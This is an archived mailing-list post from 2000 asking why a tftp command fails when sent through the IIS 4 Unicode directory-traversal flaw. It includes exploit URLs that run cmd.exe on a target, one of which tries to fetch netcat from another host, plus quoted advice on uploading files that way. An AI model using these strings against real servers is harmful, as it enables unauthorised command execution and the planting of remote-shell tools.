Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: "Loschiavo, Dave" <DLoschiavo () FRCC CC CA US>
Date: Fri, 10 Nov 2000 09:56:11 -0800
I tried tftp commands in the URL, formatted like this: http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/c md.exe?/tftp+-i+192.168.1.20+nc.exe" and got nowhere, while this: http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/c md.exe?/c+dir+c: gave me a listing of the of the c: drive. Am I formatting the "TFTP" URL incorrectly? [snip] However, a much simpler solution for uploading files is to just run "tftp.exe" or "rcp.exe" (or, various other such commands) to transfer a file from some machine you control... [snip]
Current thread:
- Re: dos commands via iis 4 (TFTP), (continued)
- Re: dos commands via iis 4 (TFTP) Bluefish (P.Magnusson) (Nov 16)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 18)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Paul Cardon (Nov 19)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Illes Marci (Nov 21)
- Re: dos commands via iis 4 (TFTP)-NETBIOS Paul Cardon (Nov 22)
- Re: dos commands via iis 4 (TFTP) Bluefish (P.Magnusson) (Nov 16)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 16)
- Re: dos commands via iis 4 (TFTP) Robert A. Seace (Nov 11)